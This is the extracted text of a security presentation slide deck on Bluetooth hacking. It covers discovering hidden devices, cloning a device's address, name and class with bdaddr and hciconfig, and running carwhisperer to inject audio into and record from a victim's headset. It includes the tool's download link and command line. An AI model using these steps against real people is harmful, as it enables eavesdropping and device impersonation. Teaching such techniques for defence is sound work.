Post on 24-Jun-2015
description
By
Swaroop YermalkaR
1. Finding Visible & Invisible
Bluetooth Devices along with their
specifications
2. Cloning Bluetooth Devices
3. Remotely Inject audio in
Bluetooth headsets and record
audio from it.
BT5 r3 laptop Galaxy
pop
Nokia Bluetooth Headset
Bluetooth Dongle
79 channels 2.4-GHz ISM band
Devices hop across these channels at a rate of 1600 times per second
Bluetooth Device Address (BD_ADDR)
Source: www.techtree.com
Initial Setup
1. Everything is in visible
Android Settings Ubuntu Settings
#hcitool scan
#hcitool inq
Find a target First
btscanner
Bluemaho
2. Let’s Find the Invisible Devices…
Source: http://hwaddress.com/
Let’s Find the Invisible Devices…
Android Settings
Start sniffing
Sniff on
mon0
SAMSUNG
It is Samsung device
We have: 00:07:AB:ff:CF:88
~MAC address minus one
~ MAC address minus 1
~MAC address plus one
FOUND!!!
#hcitool inq <bd_addr>
Enumerate the services for further attack
Recall Previous
Information…
#bdaddr -i hci1 <new_bd_addr>
#hcitool scan
#hciconfig hci1 name “android”
#hciconfig hci0 class 0x58020c
Observe the Fields
Laptop
Why to Clone the bluetooth device?
In certain premises, some bluetooth type device may be
restricted. Does it still bother you?
For many attacks such as attacks on bluetooth headset it is
necessary to make our device headset compatible.
Is our bluetooth
dongle headset
compatible?
No? change its
class.
Device conforms to the Headset Profile
Find your victim
Download url:
http://trifinite.org/Downloads/carwhispe
rer-0.2.tar.gz
#./carwhisperer <interface> <injecting audio file> <Output
file> <victim BD_ADDR>
Built on AIRcable XR™ long-range
technology
1 km external antenna included
Extended range for up to 30 km***
No external power needed
Aluminum case for reduced interference
and increased sensitivity
Yi-Bing Lin
1. Bluetooth Hacking: The state of art by
trifinite.org
2. Bluetooth Wiki
www.chmag.in
Nov-2012Sep-2012Oct-2012
Feedback, questions and suggestions:
swaroop.wireless@gmail.com